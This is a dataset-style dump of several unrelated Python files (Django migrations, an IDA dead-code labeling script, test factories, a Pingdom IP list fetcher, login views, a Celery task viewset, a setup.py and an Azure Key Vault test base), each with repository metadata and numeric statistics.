04d234c6a1d923e3aa845b6c358f8df54aee2efb | 883 | py | Python | stixy/accounting/migrations/0009_auto_20200513_0905.py | AnthonyKenny98/Stixy | 5d6dd38cc590d28dc98cca2737bbacf4f1ec69ba | [
"MIT"
] | null | null | null | stixy/accounting/migrations/0009_auto_20200513_0905.py | AnthonyKenny98/Stixy | 5d6dd38cc590d28dc98cca2737bbacf4f1ec69ba | [
"MIT"
] | 7 | 2021-03-19T03:10:21.000Z | 2021-09-22T19:00:19.000Z | stixy/accounting/migrations/0009_auto_20200513_0905.py | AnthonyKenny98/Stixy | 5d6dd38cc590d28dc98cca2737bbacf4f1ec69ba | [
"MIT"
] | null | null | null | # Generated by Django 3.0.6 on 2020-05-13 09:05
# flake8: noqa
import accounting.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('accounting', '0008_auto_20200512_1021'),
]
operations = [
migrations.AlterField(
model_name='account',
name='account_group',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='accounting.AccountGroup', verbose_name=accounting.models._Accounting.verbose_class_name),
),
migrations.AlterField(
model_name='accountgroup',
name='account_class',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='accounting.AccountClass', verbose_name=accounting.models._Accounting.verbose_class_name),
),
]
| 33.961538 | 174 | 0.689694 | 97 | 883 | 6.103093 | 0.42268 | 0.054054 | 0.070946 | 0.111486 | 0.415541 | 0.415541 | 0.415541 | 0.415541 | 0.236486 | 0.236486 | 0 | 0.04539 | 0.201586 | 883 | 25 | 175 | 35.32 | 0.794326 | 0.065685 | 0 | 0.210526 | 1 | 0 | 0.150852 | 0.083942 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.157895 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04d422e0ed33ea11793b1e0b3c99514faee79969 | 609 | py | Python | reo/migrations/0116_auto_20210818_2124.py | NREL/REopt_Lite_API | 7cd3afeb135ef89cb65dde1b305e53fe321b2488 | [
"BSD-3-Clause"
] | 41 | 2020-02-21T08:25:17.000Z | 2022-01-14T23:06:42.000Z | reo/migrations/0116_auto_20210818_2124.py | NREL/reopt_api | fbc70f3b0cdeec9ee220266d6b3b0c5d64f257a6 | [
"BSD-3-Clause"
] | 167 | 2020-02-17T17:26:47.000Z | 2022-01-20T20:36:54.000Z | reo/migrations/0116_auto_20210818_2124.py | NREL/REopt_Lite_API | 7cd3afeb135ef89cb65dde1b305e53fe321b2488 | [
"BSD-3-Clause"
] | 31 | 2020-02-20T00:22:51.000Z | 2021-12-10T05:48:08.000Z | # Generated by Django 3.1.12 on 2021-08-18 21:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('reo', '0115_auto_20210810_1550'),
]
operations = [
migrations.AddField(
model_name='chpmodel',
name='supplementary_firing_efficiency',
field=models.FloatField(blank=True, null=True),
),
migrations.AddField(
model_name='chpmodel',
name='supplementary_firing_max_steam_ratio',
field=models.FloatField(blank=True, null=True),
),
]
| 25.375 | 59 | 0.612479 | 63 | 609 | 5.746032 | 0.650794 | 0.099448 | 0.127072 | 0.149171 | 0.530387 | 0.530387 | 0.530387 | 0.320442 | 0 | 0 | 0 | 0.072893 | 0.279146 | 609 | 23 | 60 | 26.478261 | 0.751708 | 0.075534 | 0 | 0.470588 | 1 | 0 | 0.194296 | 0.160428 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04d49580568da4b9856ae2f7b9b3ef7e06b1c51d | 4,344 | py | Python | label_funcs_with_no_xrefs.py | Flygend/IDAPythonEmbeddedToolkit | 25eed67b8a67e18df5fceb362c424174128f48ae | [
"MIT"
] | 4 | 2017-06-20T06:26:57.000Z | 2022-02-12T03:50:16.000Z | label_funcs_with_no_xrefs.py | AGG2017/IDAPythonEmbeddedToolkit | da801888abf5c758bc768f2fa05779a3180a1cd6 | [
"MIT"
] | null | null | null | label_funcs_with_no_xrefs.py | AGG2017/IDAPythonEmbeddedToolkit | da801888abf5c758bc768f2fa05779a3180a1cd6 | [
"MIT"
] | 3 | 2017-07-30T03:23:06.000Z | 2018-04-29T20:05:47.000Z | ##############################################################################################
# Copyright 2017 The Johns Hopkins University Applied Physics Laboratory LLC
# All rights reserved.
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
##############################################################################################
# label_funcs_with_no_xrefs.py
# This script checks each defined function in the address range entered for cross-references.
# If there are no cross-references to the function, the prefix "noXrefs_" is added to the
# function's name. It then iterates through all functions in the code range again to identify
# all functions who's only code references are functions that have no cross-references. This
# is to detected functions called only by other functions who have no code references.
# This script helps to detect "dead code" that is never called.
#
# Inputs: start_addr: Start address for segment to define as data
# end_addr: End address for segment to define as data
#
##############################################################################################
################### USER DEFINED VALUES ###################
# None needed.
###########################################################
def addPrefixToFunctionName(prefix, functionAddr):
    name = GetFunctionName(functionAddr)
    if (name and not name.startswith(prefix)):
        name = prefix + name
        print ("[label_funcs_with_no_xrefs.py] Function 0x%x Name: " % functionAddr) + name
        MakeName(functionAddr, name)
start_addr = AskAddr(MinEA(), "Please enter the starting address for the functions to be examined.")
end_addr = AskAddr(MaxEA(), "Please enter the ending address for the functions to be examined.")
if ((start_addr is not None and end_addr is not None) and (start_addr != BADADDR and end_addr != BADADDR) and start_addr < end_addr):
print "[label_funcs_with_no_xrefs.py] Running on addresses 0x%x to 0x%x" % (start_addr, end_addr)
# If start_addr is in a function, get the starting address of that function. Else, returns -1.
curr_addr = GetFunctionAttr(start_addr, FUNCATTR_START) # Get the function head for the "start" addr
if (curr_addr == BADADDR):
# start_addr is not currently in a function so select the beginning of the next function
curr_addr = NextFunction(start_addr)
# Using this to continually iterate through all functions until no new functions
# having no code reference paths are found.
new_noXrefs_found = False
while (curr_addr != BADADDR and curr_addr < end_addr):
        if (not GetFunctionName(curr_addr).startswith("noXrefs_")):
            xrefs = XrefsTo(curr_addr)
            has_valid_xref = False
            for x in xrefs:
                if (not GetFunctionName(x.frm).startswith("noXrefs_")):
                    # Function has a valid cross-reference and is not "dead code"
                    has_valid_xref = True
                    break
if (has_valid_xref == False):
# No valid xrefs were found to this function
new_noXrefs_found = True
addPrefixToFunctionName("noXrefs_", curr_addr)
curr_addr = NextFunction(curr_addr)
if ((curr_addr == BADADDR or curr_addr >= end_addr) and new_noXrefs_found):
print "[label_funcs_with_no_xrefs.py] Iterating through range again because new functions with no Xrefs found."
curr_addr = start_addr
new_noXrefs_found = False
print "[label_funcs_with_no_xrefs.py] FINISHED."
else:
print "[label_funcs_with_no_xrefs.py] QUITTING. Invalid address(es) entered."
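Outside IDA, the two-pass labeling above amounts to a fixed-point computation over the call graph: seed with functions that have no references, then repeatedly mark functions whose only callers are already marked. A minimal pure-Python sketch (the toy graph and function names are hypothetical, and the `"ENTRY"` sentinel stands in for references from outside the analyzed range):

```python
def find_dead_functions(callers):
    # `callers` maps each function name to the set of functions that
    # reference it (a toy stand-in for IDA's XrefsTo). Seed with the
    # functions that have no references at all, then iterate to a fixed
    # point, marking functions whose every caller is already dead.
    dead = {func for func, srcs in callers.items() if not srcs}
    changed = True
    while changed:
        changed = False
        for func, srcs in callers.items():
            if func not in dead and srcs and srcs <= dead:
                dead.add(func)
                changed = True
    return dead

graph = {
    "main": {"ENTRY"},            # referenced from outside the analyzed range
    "helper": {"main"},
    "orphan": set(),              # no references at all
    "only_by_orphan": {"orphan"},
}
print(sorted(find_dead_functions(graph)))  # → ['only_by_orphan', 'orphan']
```

The outer `while changed` loop plays the same role as the script's "iterating through range again" pass: one sweep per newly discovered dead function, until a sweep finds nothing new.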
| 54.987342 | 134 | 0.679558 | 596 | 4,344 | 4.822148 | 0.342282 | 0.044537 | 0.026792 | 0.033403 | 0.127697 | 0.101949 | 0.093946 | 0 | 0 | 0 | 0 | 0.002227 | 0.172882 | 4,344 | 78 | 135 | 55.692308 | 0.797662 | 0.484807 | 0 | 0.060606 | 0 | 0 | 0.276474 | 0.085861 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.151515 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04d4d9118ea0e8d98cd4ba6cd174a06a5c614c1a | 833 | py | Python | hknweb/candidate/migrations/0001_initial.py | yuji3w/hknweb | 0df5369da28f46dc9016da97652cb6b8e2b7f3e6 | [
"MIT"
] | 20 | 2018-01-07T02:15:43.000Z | 2021-09-15T04:25:50.000Z | hknweb/candidate/migrations/0001_initial.py | yuji3w/hknweb | 0df5369da28f46dc9016da97652cb6b8e2b7f3e6 | [
"MIT"
] | 292 | 2018-02-01T18:31:18.000Z | 2022-03-30T22:15:08.000Z | hknweb/candidate/migrations/0001_initial.py | yuji3w/hknweb | 0df5369da28f46dc9016da97652cb6b8e2b7f3e6 | [
"MIT"
] | 85 | 2017-11-13T06:33:13.000Z | 2022-03-30T20:32:55.000Z | # Generated by Django 2.1.5 on 2019-02-04 21:30
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('hknweb', '0006_profile_email'),
]
operations = [
migrations.CreateModel(
name='OffChallenge',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(default='', max_length=255)),
('description', models.TextField(blank=True, default='', max_length=2000)),
('proof', models.TextField(blank=True, default='', max_length=2000)),
('officer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='hknweb.Profile')),
],
),
]
| 30.851852 | 113 | 0.595438 | 86 | 833 | 5.686047 | 0.616279 | 0.04908 | 0.09816 | 0.08998 | 0.179959 | 0.179959 | 0.179959 | 0.179959 | 0 | 0 | 0 | 0.04878 | 0.261705 | 833 | 26 | 114 | 32.038462 | 0.746341 | 0.054022 | 0 | 0 | 1 | 0 | 0.100509 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04d589beef22b81909a9507279a9f0cdaee7f248 | 716 | py | Python | netbox/virtualization/migrations/0009_custom_tag_models.py | BrnoPCmaniak/netbox | 7b517abdb68a6324950dfd0375861163c7bfff00 | [
"Apache-2.0"
] | 6 | 2017-12-01T05:13:39.000Z | 2020-01-23T13:04:43.000Z | netbox/virtualization/migrations/0009_custom_tag_models.py | emersonfelipesp/netbox | fecca5ad83fb6b48a2f15982dfd3242653f105f9 | [
"Apache-2.0"
] | 25 | 2019-09-17T19:40:50.000Z | 2022-03-11T04:01:55.000Z | netbox/virtualization/migrations/0009_custom_tag_models.py | emersonfelipesp/netbox | fecca5ad83fb6b48a2f15982dfd3242653f105f9 | [
"Apache-2.0"
] | 3 | 2017-11-18T01:28:22.000Z | 2018-05-17T14:04:43.000Z | # Generated by Django 2.1.4 on 2019-02-20 06:56
from django.db import migrations
import taggit.managers
class Migration(migrations.Migration):
dependencies = [
('virtualization', '0008_virtualmachine_local_context_data'),
('extras', '0019_tag_taggeditem'),
]
operations = [
migrations.AlterField(
model_name='cluster',
name='tags',
field=taggit.managers.TaggableManager(through='extras.TaggedItem', to='extras.Tag'),
),
migrations.AlterField(
model_name='virtualmachine',
name='tags',
field=taggit.managers.TaggableManager(through='extras.TaggedItem', to='extras.Tag'),
),
]
| 27.538462 | 96 | 0.624302 | 70 | 716 | 6.271429 | 0.585714 | 0.095672 | 0.113895 | 0.132118 | 0.346241 | 0.346241 | 0.346241 | 0.346241 | 0.346241 | 0.346241 | 0 | 0.042991 | 0.252793 | 716 | 25 | 97 | 28.64 | 0.77757 | 0.062849 | 0 | 0.421053 | 1 | 0 | 0.239163 | 0.056801 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.263158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04d98f74dadaaad5c0d7e378e0dab8a3d530d233 | 1,075 | py | Python | core/tests/factories.py | TechFrederick/ship | 5af0af05e3f949a529b9eaa84e7a9a24ec410985 | [
"MIT"
] | 14 | 2020-09-09T01:21:34.000Z | 2022-01-09T05:35:19.000Z | core/tests/factories.py | TechFrederick/ship | 5af0af05e3f949a529b9eaa84e7a9a24ec410985 | [
"MIT"
] | null | null | null | core/tests/factories.py | TechFrederick/ship | 5af0af05e3f949a529b9eaa84e7a9a24ec410985 | [
"MIT"
] | 1 | 2021-09-20T09:04:12.000Z | 2021-09-20T09:04:12.000Z | import factory
class ServiceCategoryFactory(factory.django.DjangoModelFactory):
class Meta:
model = "core.ServiceCategory"
name = factory.Sequence(lambda n: f"Service Category {n}")
slug = factory.Sequence(lambda n: f"service-category-{n}")
description = factory.Faker("sentence")
icon = "categories/shelter.png"
class ServiceFactory(factory.django.DjangoModelFactory):
class Meta:
model = "core.Service"
name = factory.Sequence(lambda n: f"Service {n}")
organization_name = factory.Faker("company")
description = factory.Faker("paragraph")
website = factory.Faker("url")
street_address = factory.Faker("street_address")
city = factory.Faker("city")
state = factory.Faker("state_abbr")
zip_code = factory.Faker("postcode")
latitude = factory.Faker("latitude")
longitude = factory.Faker("longitude")
operating_hours = "9am - 5pm Monday-Friday"
phone_number = factory.Faker("phone_number")
email = factory.Faker("email")
category = factory.SubFactory(ServiceCategoryFactory)
| 33.59375 | 64 | 0.703256 | 117 | 1,075 | 6.393162 | 0.435897 | 0.192513 | 0.084225 | 0.088235 | 0.286096 | 0.286096 | 0.286096 | 0.104278 | 0 | 0 | 0 | 0.002245 | 0.171163 | 1,075 | 31 | 65 | 34.677419 | 0.837262 | 0 | 0 | 0.08 | 0 | 0 | 0.209302 | 0.020465 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.92 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
04d9db4a9bc6ee01e77a8adb2a5269415427a678 | 289 | py | Python | pingdom.py | SamJC-FG/microblog-ipset-builder-examples | 6850acbbde8f589bb52cdce56bdad4741d8f8345 | [
"MIT"
] | null | null | null | pingdom.py | SamJC-FG/microblog-ipset-builder-examples | 6850acbbde8f589bb52cdce56bdad4741d8f8345 | [
"MIT"
] | null | null | null | pingdom.py | SamJC-FG/microblog-ipset-builder-examples | 6850acbbde8f589bb52cdce56bdad4741d8f8345 | [
"MIT"
] | null | null | null | import urllib.request
IPSET = []
IPLISTLINK = "https://my.pingdom.com/probes/ipv4"
IPLIST = urllib.request.urlopen(IPLISTLINK)
for ADDRESS in IPLIST:
    IPSETENTRY = (ADDRESS.decode().rstrip() + '/32')  # Tack on a '/32' to the entry, and append it to the list
IPSET.append(IPSETENTRY) | 36.125 | 109 | 0.712803 | 41 | 289 | 5.02439 | 0.731707 | 0.126214 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020243 | 0.145329 | 289 | 8 | 110 | 36.125 | 0.813765 | 0.190311 | 0 | 0 | 0 | 0 | 0.15812 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04dac8a52ec4cb9223eff83bae00cb4a1da30c00 | 416 | py | Python | nxos_config_import/migrations/0010_objectconfigurationstatus_post_url.py | j-sulliman/acici | 25f20bf2cdc1ceb1b4752ef0608e9628035912d3 | [
"BSD-3-Clause"
] | 4 | 2019-07-20T11:37:32.000Z | 2020-02-03T07:09:12.000Z | nxos_config_import/migrations/0010_objectconfigurationstatus_post_url.py | j-sulliman/acici | 25f20bf2cdc1ceb1b4752ef0608e9628035912d3 | [
"BSD-3-Clause"
] | 8 | 2019-12-04T23:46:30.000Z | 2021-06-10T18:30:30.000Z | nxos_config_import/migrations/0010_objectconfigurationstatus_post_url.py | j-sulliman/acici | 25f20bf2cdc1ceb1b4752ef0608e9628035912d3 | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 2.1.7 on 2019-03-22 01:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nxos_config_import', '0009_auto_20190322_1408'),
]
operations = [
migrations.AddField(
model_name='objectconfigurationstatus',
name='post_url',
field=models.URLField(default='none'),
),
]
| 21.894737 | 58 | 0.622596 | 44 | 416 | 5.727273 | 0.840909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101639 | 0.266827 | 416 | 18 | 59 | 23.111111 | 0.72459 | 0.108173 | 0 | 0 | 1 | 0 | 0.211382 | 0.130081 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04e8e3089be7716286daa298c66787746a4e98c2 | 1,840 | py | Python | administrator/controller/loginController.py | augustoberwaldt/skin-system | 4ca878d3062abcf3f68c044abaaa631c88f40c5b | [
"MIT"
] | 2 | 2017-08-29T14:17:44.000Z | 2017-08-31T14:40:39.000Z | administrator/controller/loginController.py | augustoberwaldt/diseases-recognition | 4ca878d3062abcf3f68c044abaaa631c88f40c5b | [
"MIT"
] | 2 | 2020-02-11T23:27:55.000Z | 2020-06-05T17:30:29.000Z | administrator/controller/loginController.py | augustoberwaldt/diseases-recognition | 4ca878d3062abcf3f68c044abaaa631c88f40c5b | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login, logout
from administrator.formsModel import FormUser
from django.contrib import messages
import json
def do_login(request):
    if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
        if user is not None:
login(request,user)
return redirect('/app/home')
        else:
            response = {'title': 'Dados invalidos ! ', 'message': 'Tente novamente.', 'type': 'error'}
            messages.add_message(request, messages.INFO, json.dumps(response))
if request.user.is_authenticated():
return redirect('/app/home')
return render(request, 'auth/login.html')
def resetPass(request):
return render(request, 'auth/resetPassword.html')
def register(request):
    form = FormUser.FormUser(request.POST or None)
context = {'form': form}
if request.method == 'POST':
if form.is_valid():
form.save()
            response = {'title': 'Success ', 'message': 'Cadastro realizado !', 'type': 'success'}
            messages.add_message(request, messages.INFO, json.dumps(response))
return redirect('/app/register')
        else:
            response = {'title': 'Dados invalidos ! ', 'message': 'Tente novamente.', 'type': 'error'}
            messages.add_message(request, messages.INFO, json.dumps(response))
return render(request, 'auth/register.html', context)
def do_logout(request):
logout(request)
    response = {'title': 'Success ', 'message': 'Saida com sucesso !', 'type': 'success'}
    messages.add_message(request, messages.INFO, json.dumps(response))
return redirect('/app/')
| 32.857143 | 105 | 0.640761 | 201 | 1,840 | 5.825871 | 0.298507 | 0.047822 | 0.05807 | 0.085397 | 0.336465 | 0.336465 | 0.336465 | 0.336465 | 0.336465 | 0.336465 | 0 | 0 | 0.222826 | 1,840 | 55 | 106 | 33.454545 | 0.818881 | 0 | 0 | 0.307692 | 0 | 0 | 0.180087 | 0.012514 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102564 | false | 0.102564 | 0.128205 | 0.025641 | 0.410256 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
04eca308eb0d6d73b5d0cadfa2fc74793a222035 | 3,081 | py | Python | contentcuration/contentcuration/viewsets/task.py | rgaudin/studio | f6ce46e012c59bfd8cc38c3610db25829a3628f3 | [
"MIT"
] | 1 | 2019-03-30T18:14:25.000Z | 2019-03-30T18:14:25.000Z | contentcuration/contentcuration/viewsets/task.py | rgaudin/studio | f6ce46e012c59bfd8cc38c3610db25829a3628f3 | [
"MIT"
] | 1 | 2020-07-22T02:39:07.000Z | 2020-07-22T12:30:16.000Z | contentcuration/contentcuration/viewsets/task.py | MisRob/studio | 92a5c780c8952f7d37db38952483ab7a28d3cb9d | [
"MIT"
] | null | null | null | from django.conf import settings
from django_filters.rest_framework import DjangoFilterBackend
from django_filters.rest_framework import UUIDFilter
from rest_framework.permissions import IsAuthenticated
from contentcuration.celery import app
from contentcuration.models import Channel
from contentcuration.models import Task
from contentcuration.viewsets.base import DestroyModelMixin
from contentcuration.viewsets.base import ReadOnlyValuesViewset
from contentcuration.viewsets.base import RequiredFilterSet
class TaskFilter(RequiredFilterSet):
channel = UUIDFilter(method="filter_channel")
def filter_channel(self, queryset, name, value):
channel_queryset = Channel.filter_view_queryset(Channel.objects.all(), self.request.user)
if channel_queryset.filter(id=value).exists():
return queryset.filter(channel_id=value)
return queryset.none()
class Meta:
model = Task
fields = ("channel",)
class TaskViewSet(ReadOnlyValuesViewset, DestroyModelMixin):
queryset = Task.objects.all()
permission_classes = [IsAuthenticated]
filter_backends = (DjangoFilterBackend,)
filter_class = TaskFilter
lookup_field = "task_id"
values = (
"task_id",
"task_type",
"created",
"status",
"is_progress_tracking",
"user_id",
"metadata",
)
field_map = {"user": "user_id"}
@classmethod
def id_attr(cls):
return "task_id"
def perform_destroy(self, instance):
# TODO: Add logic to delete the Celery task using app.control.revoke(). This will require some extensive
# testing to ensure terminating in-progress tasks will not put the db in an indeterminate state.
app.control.revoke(instance.task_id, terminate=True)
instance.delete()
def get_edit_queryset(self):
return Task.objects.filter(user=self.request.user)
def consolidate(self, items, queryset):
if not settings.CELERY_TASK_ALWAYS_EAGER:
for item in items:
result = app.AsyncResult(item["task_id"])
if result and result.status:
item["status"] = result.status
if "progress" not in item["metadata"]:
# Just flagging this, but this appears to be the correct way to get task metadata,
# even though the API is marked as private.
meta = result._get_task_meta()
if (
meta
and "result" in meta
and meta["result"]
and not isinstance(meta["result"], Exception)
and "progress" in meta["result"]
):
item["metadata"]["progress"] = meta["result"]["progress"]
else:
item["metadata"]["progress"] = None
item["channel"] = (
item.get("metadata", {}).get("affects", {}).get("channel")
)
return items
| 36.678571 | 112 | 0.618306 | 322 | 3,081 | 5.801242 | 0.375776 | 0.061028 | 0.043362 | 0.049786 | 0.097966 | 0.038544 | 0 | 0 | 0 | 0 | 0 | 0 | 0.293736 | 3,081 | 83 | 113 | 37.120482 | 0.858456 | 0.103862 | 0 | 0 | 0 | 0 | 0.08926 | 0 | 0 | 0 | 0 | 0.012048 | 0 | 1 | 0.075758 | false | 0 | 0.151515 | 0.030303 | 0.469697 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04edbc97eb573dfcb7e904909241b79004e0cf18 | 901 | py | Python | setup.py | vicrsp/rto | e9e0b87533ae6bc5e6ad228bb26172384802f9b7 | [
"MIT"
] | null | null | null | setup.py | vicrsp/rto | e9e0b87533ae6bc5e6ad228bb26172384802f9b7 | [
"MIT"
] | 17 | 2020-10-24T18:03:54.000Z | 2020-11-11T22:25:16.000Z | setup.py | vicrsp/rto | e9e0b87533ae6bc5e6ad228bb26172384802f9b7 | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
setup(
name='rtotools',
version='0.1.0',
description='Real-Time Optimization Tools',
url='https://github.com/vicrsp/rto',
author='Victor Ruela',
author_email='victorspruela@ufmg.br',
license='MIT',
package_dir={"": "src"},
packages=find_packages(where="src"),
python_requires=">=3.8.5",
install_requires=['pandas',
'numpy',
'matplotlib',
'seaborn',
'sklearn',
'bunch',
'scipy'
],
classifiers=[
'Development Status :: 1 - Planning',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
],
) | 31.068966 | 53 | 0.507214 | 78 | 901 | 5.782051 | 0.820513 | 0.053215 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013746 | 0.354051 | 901 | 29 | 54 | 31.068966 | 0.761168 | 0 | 0 | 0.071429 | 0 | 0 | 0.379157 | 0.023282 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.035714 | 0 | 0.035714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04eddc8bdb6ec2b2c7b89832a4aae4924f428c67 | 1,519 | py | Python | sdk/keyvault/azure-keyvault-certificates/tests/_test_case.py | GoWang/azure-sdk-for-python | f241e3734a50953c2a37c10d2d84eb4c013b3ba0 | [
"MIT"
] | 1 | 2021-09-07T18:35:49.000Z | 2021-09-07T18:35:49.000Z | sdk/keyvault/azure-keyvault-certificates/tests/_test_case.py | GoWang/azure-sdk-for-python | f241e3734a50953c2a37c10d2d84eb4c013b3ba0 | [
"MIT"
] | 1 | 2021-06-23T14:50:11.000Z | 2021-06-24T12:26:05.000Z | sdk/keyvault/azure-keyvault-certificates/tests/_test_case.py | GoWang/azure-sdk-for-python | f241e3734a50953c2a37c10d2d84eb4c013b3ba0 | [
"MIT"
] | null | null | null | # ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
from azure.keyvault.certificates._shared import HttpChallengeCache
from azure.keyvault.certificates._shared.client_base import DEFAULT_VERSION
from devtools_testutils import AzureTestCase
from parameterized import parameterized
import pytest
def suffixed_test_name(testcase_func, param_num, param):
return "{}_{}".format(testcase_func.__name__, parameterized.to_safe_name(param.kwargs.get("api_version")))
class CertificatesTestCase(AzureTestCase):
def tearDown(self):
HttpChallengeCache.clear()
assert len(HttpChallengeCache._cache) == 0
super(CertificatesTestCase, self).tearDown()
def create_client(self, vault_uri, **kwargs):
if kwargs.pop("is_async", False):
from azure.keyvault.certificates.aio import CertificateClient
credential = self.get_credential(CertificateClient, is_async=True)
else:
from azure.keyvault.certificates import CertificateClient
credential = self.get_credential(CertificateClient)
return self.create_client_from_credential(
CertificateClient, credential=credential, vault_url=vault_uri, **kwargs
)
def _skip_if_not_configured(self, api_version, **kwargs):
if self.is_live and api_version != DEFAULT_VERSION:
pytest.skip("This test only uses the default API version for live tests")
